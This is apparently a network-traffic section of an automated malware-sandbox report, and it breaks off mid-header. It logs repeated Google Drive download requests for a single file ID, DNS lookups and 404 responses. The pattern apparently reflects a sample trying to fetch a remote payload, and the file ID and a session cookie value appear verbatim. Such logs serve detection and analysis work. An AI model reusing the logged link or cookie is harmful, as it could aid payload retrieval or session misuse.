      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ5tTtxm5wj5DTEv-Nv4jj0VPWutfKq_Jo0teQ30BwXGcVOHnb3buB5hgoMcqA9YmfnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:01 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-3bPcayjmvUMClbpbEpuo0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=A51veOGMBoflEz9I9373hdIRikrvpntSBFcLDCczFmkeUnL71LyQ7hvm-gMNLikE1ufhHjo9HZJuTOrc-bfAuag0I5ufBYRFoLJBmxHHDdtyb2gm0p0ke9UAvxCfgsdKOC0kMdCCf5afYNTNboYpbv3JSb5Qf6xztqsC7hZ8q6kFnf22ynDW3Y4; expires=Sun, 13-Jul-2025 04:28:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQhF838aA3jiPeC49oif7aVjz1vtYuDsOlRSZlW8XHrn4MOtjKr8-ICISBWEMMFr0d0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-r_MFGG4hWH0BhbXJRdkGjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSfJKVgMCjiq-Wy7DC58_igsZT8tx6OA-1n2rMKLxPXMRNSmtnv0DQQJ0N08Fac9M54Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:06 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-pmEw0zM6_DVKISqZevZ_hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSHmeiN_O0VkbagjCrcxRMEFDZuBCKj-tAQT-tPceKOD6oP3fA-M1oZ2BFPY2PVpCdCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-dgimboZauwRnVMK3mAnD9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQNJqNFDAFPq5uccp9dyEHmJbLd3u_jSWKhlaQz1jyQNp_-3166CoQf1G9r14W5fIuMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:11 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zpfcBhQWZ6FO5PeGKGq2zA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRlMbaq1Y-iqeLMwt6QrJy4v5SKHOWTR-YZPgGpYDLvwrF0OCWY4ITMIHnhx5emJdfkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-j_T0DR8vgrQB2eDWrjKpjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQLhufAgrAgdh-N9Wh2MKIScDVLvm2cJXzcEsmvz2wxwZNpbMwxPKNQ4cZDpykWxMynContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:16 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KQ91EmzVDghX3w5eyMWlgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSzUbDwmVRmlsWZHCApqs9_hTockWhjWVTadlBHnKY69C1wFBCR8nFpIct8O-cEdvP3cwsZ7RIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:18 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-uzqnJ5y-7flUkm1Axl61Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2jgYZZqhKKnKkcykpTY4WaDb3A1Mwsz8d3yNeE2WzjZZqX2o4zuRGTK8vmcr_izKe9vVLkX0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:28:21 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KVjUz6AGEt_5sIzzr-XOBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: 